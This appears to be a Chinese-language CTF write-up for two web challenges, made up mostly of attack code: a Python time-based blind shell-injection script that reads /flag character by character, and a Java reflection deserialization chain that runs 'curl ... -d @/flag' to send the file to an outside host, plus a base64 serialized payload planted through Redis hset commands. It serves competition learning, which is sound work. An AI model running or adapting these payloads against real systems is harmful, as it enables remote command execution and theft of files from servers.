DAS X BJD3rd(2解)

幫幫小紅花

二分法，shell注入

SLEEP_TIME可以設置的稍微長點，會穩定很多。

import requests
import time
url = "http://183.129.189.60:10070/?imagin="
requests.adapters.DEFAULT_RETRIES = 3 # 最大重連次數防止出問題

SLEEP_TIME = 0.25 
kai_shi = time.time()
flag=""
i = 0 # 計數器
print("[start]: -------")

while( True ):
	head = 32
	tail = 127
	i += 1

	while ( head < tail ) :
		mid = ( head + tail ) >> 1
		payload = '''h3zh1=$( cat /flag | cut -c %d-%d );if [ $( printf '%%d' "'$h3zh1" ) -gt %d ];then sleep %f;fi''' % ( i, i, mid, SLEEP_TIME)
		
		start_time = time.time() # 開始
		r = requests.get(url+payload)
		end_time = time.time() # 結束
		#print(payload)

		if ( end_time - start_time > SLEEP_TIME ) : 
			head = mid + 1
		else :
			tail = mid
	
	if head!=32:
		flag += chr(head)
		print("[+]: "+flag)
	else:
		break

print("[end]: "+flag)
jie_shu = time.time()

print("程序運行時間:"+str(jieshu - kaishi))

布吉島

涉及java反序列化、反射、redis簡單命令

知識點可以參考，下方鏈接，基本上一個連接就講的很明白了。

師傅出的這個題反射思路是一樣的。

參考連接:https://xz.aliyun.com/t/4558

結束了才寫完，才發現，原來我走了那么多坑，tcl，謝謝imagin師傅好心救我。

imagin師傅說我的思路差不多

java & python構造exp

package lucky;
import DatabaseHandler.Handler;
import DatabaseHandler.SerializeUtil;
import ReflectionHandler.Chain;
import ReflectionHandler.Const;
import ReflectionHandler.DoMethod;
import ReflectionHandler.Reflect;

import java.io.*;


public class H3zh1 {
    public static void main(String[] args) throws Exception {

        Reflect[] transformers = new Reflect[] {
                //傳入Runtime類
                new Const(Runtime.class),

                //反射調用getMethod方法，然后getMethod方法再反射調用getRuntime方法，返回Runtime.getRuntime()方法
                new DoMethod("getMethod",
                        new Class[] {String.class, Class[].class },
                        new Object[] {"getRuntime", new Class[0] }),

                //調用invoke,反射執行Runtime.getRuntime()方法,獲得Runtime
                new DoMethod("invoke",
                        new Class[] {Object.class, Object[].class },
                        new Object[] {null, new Object[0] }),

                //調用exec執行命令
                new DoMethod("exec",
                        new Class[] {String.class },
                        new Object[] {"curl http://xxx.xxx.xxx -d @/flag"})
                    	//new Object[] {"clac"})//本地測試啟動計算器
                    
        };

        Chain transformerChain = new Chain(transformers);
        //System.out.println(transformerChain);
        try{
            File f = new File("h3zh1.bin");
            ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
            out.writeObject(transformerChain);
            out.flush();
            out.close();
        }catch (IOException e){
            e.printStackTrace();
        }
        //下方代碼是測試自己是否能運行成功的
        try {
            FileInputStream f = new FileInputStream("h3zh1.bin");
            DataInputStream dis = null;
            dis = new DataInputStream(f);
            byte []b = new byte [1024];
            dis.read(b);
            Chain expobject = (Chain) SerializeUtil.deserialize(b);
            expobject.doMethod("c",null);
            
           // System.out.println(expobject.getClass());
        }
        catch (FileNotFoundException e){
            e.printStackTrace();
        }catch (ClassNotFoundException e){
            e.printStackTrace();
        }catch (IOException e){
            e.printStackTrace();
        }


    }
}

把得到的二進制文件用base64編碼輸出，引用我之前寫Think java的腳本。

import base64
file = open("h3zh1.bin","rb")
now = file.read()
ba = base64.b64encode(now)
print(ba)
file.close()

接下來是觸發

關鍵代碼塊1(product.jsp)

關鍵代碼塊2(Handler.java)

關鍵代碼3（SerializeUtil）

這段代碼擁有readObject（）,唯一的觸發點

想要使第一段關鍵代碼觸發就得使uuid有對應的data數據。

得到序列化的字段，要登錄redis，然后去設置。

(redis是可以登錄的，我是沒想到的，我當時看了很久覺得除了這個辦法沒別的了，后來dkk師傅也告訴我可以，不過我ip地址輸錯了所以一直沒上去過)。

后來換了java項目的10049端口~(枯了)，比賽結束幾分鍾后問了問師傅，師傅說是端口錯了(正確的redis端口是10050)，我真是蠢了，一個服務一個端口，怨不得題目給那個提示。(心情復雜.jpg)。

真是弟弟……。

靶機沒斷繼續復現。。。

接下來就是去redis把數據加上，然后訪問觸發序列化即可。

整個鏈就是Handler::getData()一系列的反射-->SerializeUtil::deserialize()中的readobject觸發

連接redis

先看看自己的uuid對應的data字符串，顯示肯定是空的
hget uuid data 
設置一下自己python中得到的base64序列化字符串
 hset uuid data
"rO0ABXNyABdSZWZsZWN0aW9uSGFuZGxlci5DaGFpbgAAAAAAAAABAgABWwAOYWxsUmVmbGVjdGlvbnN0ABxbTFJlZmxlY3Rpb25IYW5kbGVyL1JlZmxlY3Q7eHB1cgAcW0xSZWZsZWN0aW9uSGFuZGxlci5SZWZsZWN0O27OkLYQbHxuAgAAeHAAAAAEc3IAF1JlZmxlY3Rpb25IYW5kbGVyLkNvbnN0ONoeVTek5d0CAAFMAAZvYmplY3R0ABJMamF2YS9sYW5nL09iamVjdDt4cgAZUmVmbGVjdGlvbkhhbmRsZXIuUmVmbGVjdHpfoXNq0Bg/AgAAeHB2cgARamF2YS5sYW5nLlJ1bnRpbWUAAAAAAAAAAAAAAHhwc3IAGlJlZmxlY3Rpb25IYW5kbGVyLkRvTWV0aG9kpR/+IycgVdsCAANbAAVpQXJnc3QAE1tMamF2YS9sYW5nL09iamVjdDtMAAtpTWV0aG9kTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2lQYXJhbVR5cGVzdAASW0xqYXZhL2xhbmcvQ2xhc3M7eHEAfgAHdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAnQACmdldFJ1bnRpbWV1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAB0AAlnZXRNZXRob2R1cQB+ABMAAAACdnIAEGphdmEubGFuZy5TdHJpbmeg8KQ4ejuzQgIAAHhwdnEAfgATc3EAfgALdXEAfgAQAAAAAnB1cQB+ABAAAAAAdAAGaW52b2tldXEAfgATAAAAAnZyABBqYXZhLmxhbmcuT2JqZWN0AAAAAAAAAAAAAAB4cHZxAH4AEHNxAH4AC3VxAH4AEAAAAAF0ACJjdXJsIGh0dHA6Ly8xMTcuNzguOC4xMzEgLWQgQC9mbGFndAAEZXhlY3VxAH4AEwAAAAFxAH4AGA=="

可以參考我的，不過我的ip和uuid和你們的不一樣。

如下僅供參考，直接跑是得不到flag的。

hget c8a7ec06aeb24dfb92dde7292f21fb62 data 

hset c8a7ec06aeb24dfb92dde7292f21fb62 data rO0ABXNyABdSZWZsZWN0aW9uSGFuZGxlci5DaGFpbgAAAAAAAAABAgABWwAOYWxsUmVmbGVjdGlvbnN0ABxbTFJlZmxlY3Rpb25IYW5kbGVyL1JlZmxlY3Q7eHB1cgAcW0xSZWZsZWN0aW9uSGFuZGxlci5SZWZsZWN0O27OkLYQbHxuAgAAeHAAAAAEc3IAF1JlZmxlY3Rpb25IYW5kbGVyLkNvbnN0ONoeVTek5d0CAAFMAAZvYmplY3R0ABJMamF2YS9sYW5nL09iamVjdDt4cgAZUmVmbGVjdGlvbkhhbmRsZXIuUmVmbGVjdHpfoXNq0Bg/AgAAeHB2cgARamF2YS5sYW5nLlJ1bnRpbWUAAAAAAAAAAAAAAHhwc3IAGlJlZmxlY3Rpb25IYW5kbGVyLkRvTWV0aG9kpR/+IycgVdsCAANbAAVpQXJnc3QAE1tMamF2YS9sYW5nL09iamVjdDtMAAtpTWV0aG9kTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2lQYXJhbVR5cGVzdAASW0xqYXZhL2xhbmcvQ2xhc3M7eHEAfgAHdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAnQACmdldFJ1bnRpbWV1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAB0AAlnZXRNZXRob2R1cQB+ABMAAAACdnIAEGphdmEubGFuZy5TdHJpbmeg8KQ4ejuzQgIAAHhwdnEAfgATc3EAfgALdXEAfgAQAAAAAnB1cQB+ABAAAAAAdAAGaW52b2tldXEAfgATAAAAAnZyABBqYXZhLmxhbmcuT2JqZWN0AAAAAAAAAAAAAAB4cHZxAH4AEHNxAH4AC3VxAH4AEAAAAAF0ACJjdXJsIGh0dHA6Ly8xMTcuNzguOC4xMzEgLWQgQC9mbGFndAAEZXhlY3VxAH4AEwAAAAFxAH4AGA==